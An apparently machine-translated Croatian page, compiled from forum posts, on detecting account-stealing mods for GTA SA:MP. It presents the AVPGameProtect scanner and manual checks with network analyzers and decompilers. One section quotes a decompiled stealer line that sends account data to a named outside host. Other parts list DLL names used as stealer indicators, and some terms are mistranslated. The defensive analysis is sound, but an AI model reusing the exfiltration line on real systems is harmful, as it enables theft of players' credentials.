Provjerite datoteku za stiller online. Internet vodič - sve najzanimljivije stvari na internetu. Informacije o rezultatima pretraživanja



Prvi skener, koji se pojavio još u danima kada je razvijen prvi ASI styler. Već sljedeći dan nakon pojave stillera, počeo sam razvijati svoj vlastiti anti-steeler.

Skener uključuje sljedeće module:
- YARA signature engine (hvala Virustotal programerskom timu za tako moćan alat),
- mehanizam za skripte Andreasa Jonsona (AngelScript), brzina, jednostavnost ugradnje i ljepota sličnih skripti u jednom projektu. Zahvaljujući njemu možete brzo i tehnički otvoriti kriptore za CLEO.
- Emulator SCM koda, sposoban prilično dobro promovirati CLEO kriptore (od mene)

Značajke programa:
– Dosta velika baza kradljivaca, koja raste otprilike od 2014. godine. Prikupili smo dosta zlonamjernih modifikacija s nekoliko velikih i manje velikih stranica.
- Mogućnost skeniranja mapa i datoteka povlačenjem u prozor programa.
- Zaključak kratka informacija O malware(vrsta, nadimak programera i, u starijim verzijama baze, nadimci distributera)
- Skenirajte asi, dll, cleo, sf, cs i druge potencijale opasne datoteke.
- Otkrivanje zlonamjernog koda u datotekama s promijenjenim nastavkom, na primjer, ne tako davno bilo je moderno preimenovati kradljivce u txd datoteke i učitati ih u igru ​​pomoću učitavača.
- Raspakiranje kriptiranih CLEO skripti i naknadno skeniranje (treba napomenuti da dekriptira samo poznate kriptore i one na koje smo mi naišli, ali tu činjenicu je lako popraviti, samo nam pišite e-poštom i pošaljite datoteku). Kada skenirate otpakiranu skriptu, možete pronaći izvor potonje u datoteci temp\decrypt.cs.
- Emulirajte SCM kod u hodu i dešifrirajte skriptu, nakon čega slijedi provjera zlonamjernog koda. (Ako se otkrije zlonamjerni kod, pogledajte ispis u temp\decrypt.cs)
- Prijateljsko i intuitivno programsko sučelje.
- Velika brzina skeniranje prilikom provjere velikog broja datoteka.
- Ugrađeni pregled pronađene datoteke u tekstualnom i heksadecimalnom načinu

Posebno važna točka! Svatko bi ga trebao pročitati da ne postavlja glupa pitanja.
Skener je dizajniran samo za provjeru izmjena igre otpakiranih iz arhive, u svakom drugom slučaju je beskoristan!
On također Nenamjerno za instalatere i auto-instalatere, msi, exe pakete, pif, mmbak, com, scr, vbs, bat, cmd, js i druge potencijalno opasne datoteke koje nema u igri modovima, postoje antivirusi za ove datoteke!
Također NE biste trebali skenirati cijeli sustav, beskorisno je i nema smisla. Ovaj skener je mod testiran i namijenjen je samo modovima. Možete skenirati mapu igre, ali ovdje morate razumjeti da igra ima datoteke koje mogu pristupiti internetu i biti spremne da budu vidljive u prozoru skenera.

Htio bih vas odmah upozoriti da ovaj program neće zaštititi vaše račune 100%, kao bilo koji drugi antivirus ili skener. Kad na naslovnici antivirusa napišu 100% zaštitu, za mene je to već znak da antivirus maknem s diska. Ali ovaj skener može ubrzati provjeru već poznatih kradljivaca i pomoći vam da izbjegnete da padnete na mamac neiskusnih distributera.
Najviše najbolji antivirus- Vaša je glava i odluka - preuzeti ili ne preuzeti. Modove preuzimajte samo s pouzdanih stranica i gdje se nadzire sigurnost arhive.


Autor programa nije odgovoran za vaše odluke i moguće kradljivce koje je promakao skener.

Neki simboli programi:


Pažnja! Otkrivena je datoteka koja može uspostaviti internetsku vezu, trebali biste razmisliti o tome prije nego što je instalirate u igru. Ali to bi moglo biti i automatsko ažuriranje skripte. Također je moguće imati URL u datoteci. Sve ovisi o vašoj sposobnosti da ručno provjerite datoteke.

CLEO styler je pronađen, datoteka je raspakirana i možete pogledati izvor.

Skener je pokušao raspakirati skriptu, ali možda nije uspio ili zlonamjerni kod nije pronađen. Pogledajte izvor u privremenoj mapi. Provjerite nije li datoteka šifrirana. Ovdje morate ručno provjeriti skriptu.

Pronađen CLEO stiller u otvorenom obliku.

Pronađena je datoteka koja preuzima zlonamjerni softver na vaše računalo

Pronađen je destiler iz ozloglašenog projekta

Pronađena zaštita, datoteka može predstavljati prijetnju. Ovdje se samo treba osloniti na poštenje i ugled autora. Pitajte autora zašto je datoteka šifrirana (zaštićena), a zatim sami razmislite o primjerenosti odgovora. Ova datoteka može biti opasna.

Možda je datoteku blokirala neka druga aplikacija ili je datoteka nulte veličine

Ne preporučujem stavljanje takvih datoteka u igru. Ovdje se svašta može očekivati. Ovo je spajanje nekoliko datoteka u jednu. Među tim datotekama može biti stealer ili drugi zlonamjerni softver. Ne vjerujte ljepilima. U sigurnost lijepljenja možete se uvjeriti samo razvrstavanjem u datoteke i provjerom svake datoteke zasebno.


Molimo vas da program preuzimate samo sa službenih izvora. Ovo će biti najviše sigurna opcija.
Pišite o svim pogreškama e-poštom ili u ovoj temi.


Za dinamičku zaštitu računa preporučujemo korištenje posebnog dodatka tvrtke DarkP1xel.

Ovaj dodatak blokira opasne funkcije u skriptama i drugim modovima.
Ako imate ovaj dodatak instaliran u igri, tada modovi neće moći slati web zahtjeve poslužiteljima trećih strana, što znači da vaša samp lozinka neće pasti u pogrešne ruke, čak i ako ste slučajno instalirali stealer u igra. Dodatak također vodi detaljnu evidenciju svih sumnjivih događaja u igri. Važno. Dodatak se stalno ažurira, ostanite s nama.
p.s: ne zaboravite zahvaliti autoru na dodatku;)

Hvala svima koji su nam pomogli.
Posebna zahvala Gedwadionu, DarkP1xel. Ovo su cool momci koji imaju budućnost u IT sigurnosti.

Autori:
smalloff - razvoj, podrška projektima
andre500 - testiranje, podrška projektima
Web stranice autora (službeni izvori): web stranica, Libertycity.ru
Mail: smalloff@site
Preuzmite program:AVPGameProtect18042019.rar
Počastite programera pivom (unaprijed hvala): Yandex nefiltrirano

(Pažnja! Podrška javnom projektu je u potpunosti ukinuta.)

[Ozbiljan glas Chonishvilija]: Bez puno riječi. Zajebi emisiju. Dok ovo pišem, tvoj bilten i vila na BB-u su već pripojeni državi, a virtuali su prebačeni na napadača, ah-ha-ha-ha kašalj kašalj kašalj kašlja *zagušio*

Možete ohladiti svoje prdeže jer se cleo datoteke ne učitavaju na stranicu. Ali to ne znači da su zabranjeni na projektu Samp-Rp. Ne daj se zbuniti, dovraga!
Svi ljubitelji modifikacija susreli su se s pojmom "Stiller" (a.k.a Keylogger, ali to je druga priča). Obično ih stilleri stavljaju u cleo-skripte, o kojima ćemo sada govoriti.

Što je cleo skripta?

Neću objašnjavati što je cleo skripta. opći koncept, prijeđimo ravno na online igru. Cleo-skripte za SA:MP"a dizajnirane su za poboljšanje udobnosti igre. Zahvaljujući njima, možete promijeniti sučelje kako vam odgovara. Popravite razne greške, rušenja itd. Ali postoje i zlonamjerni (ili varljivi) cleo -skripte (cheat - obmana s engleskog), koje su, usput, strogo zabranjeno na projektu Samp-Rp . Stvorene su za djecu koju je život uvrijedio i koju su tukli u školi. Pa, ne možete a da ne ubacite frazu: “Chicks su poput Viagre, za one koji to ne mogu sami.”
Najpoznatije cleo-skripte ( .c leo s cript datoteke) - ovo je HP indikator u brojkama, kvadratni radar, skripta koja povećava FPS, razni oblici oklopa i pruge zdravlja (ponekad to nisu samo pruge, već vaš omiljeni lik, npr. A$AP Rocky. Kako se HP smanjuje, fotografija nestaje i ostaje samo silueta).
Mnoge ljude muči pitanje, zašto nema serije enb na stranici? Činjenica je da .asi formatu, ovo je također cleo datoteka, samo kompajlirana. Odnosno, u njega možete ušiti i styler.
Vjerojatno se pitate zašto pišem temu ako ionako nema Cleo na stranici. Ali ovo nije na web mjestu, ali da biste ga sadržavali, trebate najmanje StreamMemFix1.0 .asi A ovo je samo jedan od mnogih popravaka za GTA, od kojih je svaki ljubitelj pumpanja svog Sana pun Andreas modificira do kraja i tako od toga napravite slatkiše. A ja već šutim o c-hudovima i drugim modifikacijama. Žalite li zbog računa? Onda je ova tema za vas!

Kako provjeriti .cs datoteku za styler?

Najčešći način je provjera kroz program Wireshark. Sve što trebaš:

  • 1. Preuzmite sam program (to možete učiniti sa službene web stranice).
  • 2. Pogledajte ovaj video, tamo je sve jasno objašnjeno.

=====================================================================================================

Drugi način da provjerite Cleo za Stillera. U Najnovija verzija dolaze kleo-knjižnice dodatni programi, jedan od njih se zove Sunčani graditelj- što nam treba.


0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - stranica na koju se šalju podaci o računu.
@stealer_by_mg 0 1@ je sam programer stealera.

=================================================================================================

Također, postoji i treći način provjere datoteke za kradljivca. Postoji skripta "steal_logger" .asi“Upotrijebit ćemo ga da provjerimo.
(Da, on sam je cleo format, ali nema razloga za brigu ako ne mislite s njim ući u bazu). Neću vam dati link na njega, potražite ga na internetu.
Ukratko ću objasniti kako ga koristiti.

  • 1. Stavite ga u mapu igre.
  • 2. Idemo bilo koji SA:MP poslužitelj, pod bilo koji nitko
  • 3. Smislimo bilo koju lozinku, prijavimo se i zatvorimo igru.
  • 4. Trebao bi biti kreiran u mapi tekstualna datoteka (.txt format). Kliknite na njega, au tekstu tražimo redak s IP-om našeg poslužitelja i lozinkom za novoregistrirani račun. Pronađeno - znači da haker već ima te podatke. Neka je sretan kad uđe da se igra sa bičem. I u ovom trenutku brišemo posljednju cleo datoteku.

[!] Koristite kao ček samo novostvorenih računa, nemojte se prijavljivati ​​na svoje glavne račune ovom skriptom. Nakon provjere izbrišite \ ili napravite zasebnu kopiju GTA za provjeru skripti [!]

Kako provjeriti .asi datoteku za kradljivca?

Lakši dio je gotov. Sada naučimo provjeravati .asi-datoteke, jer styler u njima ne vidi Wireshark. Što uraditi? Objavit ću nekoliko najpoznatijih metoda.

Najviše učinkovita metoda provjere. Provjera kroz program IEInspector HTTP analizator.


===============================================================================================================

Drugi način je provjeriti kod pomoću notepada.

  • 1. Otvor .asi putem Notepada.
  • 2. Pogledajmo kod.

Primjer čistog kada (bez smirivača)

Primjer koda sa mirniji(ne kernel.dll)


Obratimo pozornost na posljednje retke.

Druga opcija za skrivenog kradljivca su imena u tekstu "urlmon.dll", "wininet.dl l", "wsock32.dll" u samom kodu. Ili linija " kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA POGREŠKA UČITAVAČA"

========================================================================================================

"Administracija ne vraća izgubljene račune"- rekli su.
"Sigurnost računa je u vašim rukama". Nadam se da su nakon čitanja ove teme vaše "ruke gore" ojačale. Vodite računa o svojim računima.

2015-2015 © Prikupljeno s raznih foruma.

AVPGameProtect je program koji vam pomaže u pretraživanju zlonamjerne datoteke u modifikacijama igre. glavna značajka programi ispred ostalih programa protiv krađe - mogućnost masovnog skeniranja, tj. možete skenirati apsolutno sve datoteke i u bilo kojoj količini, samo prenesite potrebne datoteke ili mapu s datotekama u prozor programa i pričekajte rezultate skeniranja.

Značajke programa:
- Velika baza kradljivaca koja se vodi od 2014.
- Skenirajte asi, dll, cleo, sf, cs i druge potencijalno opasne datoteke.
- Velika brzina pri skeniranju velikog broja datoteka.
- Prikaz informacija o kradljivcu u prozoru programa (vrsta kradljivca ili nadimak programera).
- Ugrađeni pregled pronađenih datoteka u tekstualnom i heksadecimalnom načinu.
- Potražite funkcionalnost za interakciju s internetom ili preuzimanje datoteka.
- Provjera CLEO skripti na prisutnost stealera (ne sve, samo one s kriptorima poznatim programu). Dešifrirana skripta pojavit će se u privremenoj mapi, u korijenskoj mapi programa pod imenom decrypt.cs
- FuncCrypt transkript od SR_Team i mnogi drugi.
- Kontinuirana podrška programu.

Skener nije namijenjen za provjeru programa za instalaciju i nadogradnji igara ili za potpuno skeniranje računala. Za skeniranje morate izdvojiti mapu ili datoteke iz arhive i povući ih u program.

Također je vrijedno napomenuti da program ne štiti korisnike 100%. Kao i svaki drugi anti-stealer, namijenjen je samo identificiranju njemu poznatih kradljivaca, a daljnja odluka o korištenju ovog ili onog moda ovisi izravno o vama i autor nije odgovoran za VAŠE odluke. Program će se stalno ažurirati.

Neke programske konvencije:
InetLoader- Pažnja! Otkrivena je datoteka koja može uspostaviti internetsku vezu, razmislite o tome prije preuzimanja. Ali to bi moglo biti i automatsko ažuriranje skripte.
CLEO_Stealer - CLEO styler je pronađen, datoteka je raspakirana i možete pogledati izvor.
CLEO_Crypter - Skener je pokušao raspakirati skriptu, možda nije uspio ili zlonamjerni kod nije pronađen. Pogledajte izvor u privremenoj mapi.
CLEO_Stealer- Pronađen CLEO stiller u otvorenom obliku.
Downloader_stealer- Pronađen je fajl koji preuzima malware na vaše računalo
Stealers_ru- Pronađen je stiler iz poznatog projekta
Opasnost_VMProtect- Pronađena zaštita, datoteka može predstavljati prijetnju
Skeniranje nije uspjelo - Datoteku je možda blokirala druga aplikacija ili je datoteka nulte veličine
JoinFiles- Skener je pronašao nekoliko datoteka koje su spojene u jednu. Među tim datotekama može biti stealer ili drugi zlonamjerni softver.

Kako izbjeći da naletiš na kradljivca?!

Stealer je skripta koja se instalira kopiranjem datoteke sa zloćudnim kodom u mapu GTA. Nakon instalacije, svaki put kada se prijavite na poslužitelj igre, on će pročitati sve unesene podatke u dijalozima (pin kodove, lozinku, tajne ključeve, podatke) i poslati ih napadaču. Dakle, jednostavnim instaliranjem skripte u GTA mapu, ako unesete točne podatke u dijalog, možete izgubiti sve svoje račune za igru.

Na ovaj trenutak Slučajevi krađe računa igara na raznim Samp poslužiteljima postali su sve češći. Najčešće su to poslužitelji s načinom igranja uloga, budući da valuta igre ima svoju vrijednost. Napadači zarađuju na tvojoj gluposti. U ovom članku ću vam pokazati metode koje poznajem. Znate, ljudi koji čine ove kradljivce žive po principu "Ako ne jedeš, nećeš živjeti."

Osnovni savjeti:

1. Uvijek koristite sve metode zaštite računa koje vam je dala administracija projekta na kojem igrate. (Grafički PIN kod, SMS vezanje itd. Sve ovisi o funkcionalnosti poslužitelja).
2. Koristite lozinku koja je što duža i ima složenu strukturu.
3. Nemojte se prijavljivati ​​na poslužitelj s lozinkom koju koristite na drugima.
4. Ne dijelite podatke o svom računu s osobom u koju niste 100% sigurni.
5. Ne savjetujem vam da koristite razne prilagođene izmjene u igri. Mogu sadržavati šifrirani virus (Stiller). Stiller (od engleskog krasti, ukrasti) je određena klasa trojanaca (malware, virusi - što god želite), čija se funkcionalnost u potpunosti sastoji od krađe lozinki pohranjenih u sustavu i njihovog slanja "autoru"
Nakon što ste instalirali stealer mod, prilikom ulaska u igricu unijet ćete svoju lozinku i ona će uspješno prijeći u ruke lopova. Najčešće ugrađen u modove kao što su (Hood, grafičke postavke i Asi dodatak).
6. Koristite antivirus! Ne dopušta vam slanje spremljene pošte ili računa zaraženim stranicama (zaštita od grabbera i kradljivaca (exe)).
7. Administracija SA:MP poslužitelja ne vraća hakirane račune i ne vraća novac koji je izgubljen i nikada neće tražiti vaše lozinke računa.

Prvi način.

I tako je prva metoda 100% učinkovita!!!
Ako ne skidate razne modove, cleo skripte, varalice, onda nećete imati NIKAKVIH problema i NEMA stealera!

Provjerite putem web stranice:

Prva metoda će zaštititi od svih hakova, ali nije prikladna za sve.
I tako je druga metoda prikladna za one koji preuzimaju skripte, razne modifikacije, nape, varalice i tako dalje. Stoga, imam izlaz za vas, ali on vas neće zaštititi 100%! Stranica koja provjerava datoteke za razne skripte, upravo ovdje . Posjetom stranice možete pročitati "

Najnovije verzije stealera mogu imati formate .txd .dff .png .dat. Ali oni su povezani u .asi .cs .sf dodacima i neće raditi bez veze. Stoga provjerite sve dodatke i skripte pomoću našeg alata za provjeru. Ako imate skrivene datoteke u GTA, izbrišite ih.


Iz ovoga zaključujemo da sada stillers mogu ugraditi običnu fotografiju u modove, čak i u .png datoteku. Mnogi ljudi kažu

"Jesi li ti ovca ili nešto? Gubi se odavde! Igram SA:MP 5 godina i znam da stealeri dolaze samo u modovima ili cleo formatima!"

Nema tipova, kao što možemo vidjeti čak i na jednostavnoj slici, weapon.png recimo znam, možda kradljivac! Uvijek provjeravamo bilo koji mod, kako biste uopće vjerovali nekome. I tako, kada provjeravamo datoteku za miritelj, ako iskoči

Podaci o rezultatima pretraživanja:

Kradljivac nije pronađen:

Tijekom skeniranja datoteke nije pronađen zlonamjerni kod ili bilo što sumnjivo. To znači da ne morate brinuti o svom računu, naš alat za provjeru koristi sve moguće metode otkrivanje zlonamjernog koda u skriptama.

Značajke programa:
– Dosta velika baza kradljivaca, koja raste otprilike od 2014. godine. Prikupili smo dosta zlonamjernih modifikacija s nekoliko velikih i manje velikih stranica. Posebno zahvaljujemo stranici Gtavicecity.ru na dostavljenim uzorcima.
- Mogućnost skeniranja mapa i datoteka povlačenjem u prozor programa.
- Prikazuje kratke informacije o zlonamjernom programu (vrsta, nadimak programera, au starijim verzijama baza podataka distributera)
- Skenirajte asi, dll, cleo, sf, cs i druge potencijalno opasne datoteke.
- Otkrivanje zlonamjernog koda u datotekama s promijenjenim nastavkom, na primjer, ne tako davno bilo je moderno preimenovati kradljivce u txd datoteke i učitati ih u igru ​​pomoću učitavača.
- Raspakiranje kriptiranih CLEO skripti i naknadno skeniranje (treba napomenuti da dekriptira samo poznate kriptore i one na koje smo mi naišli, ali tu činjenicu je lako popraviti, samo nam pišite e-poštom i pošaljite datoteku). Kada skenirate otpakiranu skriptu, možete pronaći izvor potonje u datoteci temp\decrypt.cs.
- Emulirajte SCM kod u hodu i dešifrirajte skriptu, nakon čega slijedi provjera zlonamjernog koda. (Ako se otkrije zlonamjerni kod, pogledajte ispis u temp\decrypt.cs)
- Prijateljsko i intuitivno programsko sučelje.
- Dosta jednostavan koncept programa, što znači da se može lako i često ažurirati.
- Velika brzina skeniranja pri skeniranju velikog broja datoteka.
- Ugrađeni pregled pronađene datoteke u tekstualnom i heksadecimalnom načinu

Skener je namijenjen samo za provjeru izmjena igre otpakiranih iz arhive; u svakom drugom slučaju je beskoristan.
Također NIJE namijenjen instalaterima i autoinstalaterima.

PAŽNJA!!!
Želio bih vas odmah upozoriti da ovaj program neće zaštititi vaše račune 100%, kao bilo koji drugi antivirus ili skener. Kad na naslovnici antivirusa napišu 100% zaštitu, za mene je to već znak da antivirus maknem s diska. Ali ovaj skener može ubrzati provjeru već poznatih kradljivaca i pomoći vam da izbjegnete da padnete na mamac neiskusnih distributera.
Najbolji antivirus je vaša glava i odluke - preuzeti ili ne preuzeti. Modove preuzimajte samo s pouzdanih stranica i gdje se nadzire sigurnost arhive.

Neke programske konvencije:

U RAZVOJU

HttpAnalyzer je analizator mrežnog prometa. Ako ste tražili funkcionalni alat čija je svrha praćenje HTTP i HTTPS prometa u stvarnom vremenu, onda mislim da bi vam se trebao svidjeti ovaj program, to je neka vrsta njuškala koji može jasno prikazati sve potrebne informacije o vezama!

Općenito, HTTP Analyzer može učiniti mnogo stvari, mislim da možete detaljnije pročitati na službenoj web stranici, napisao sam glavnu ideju.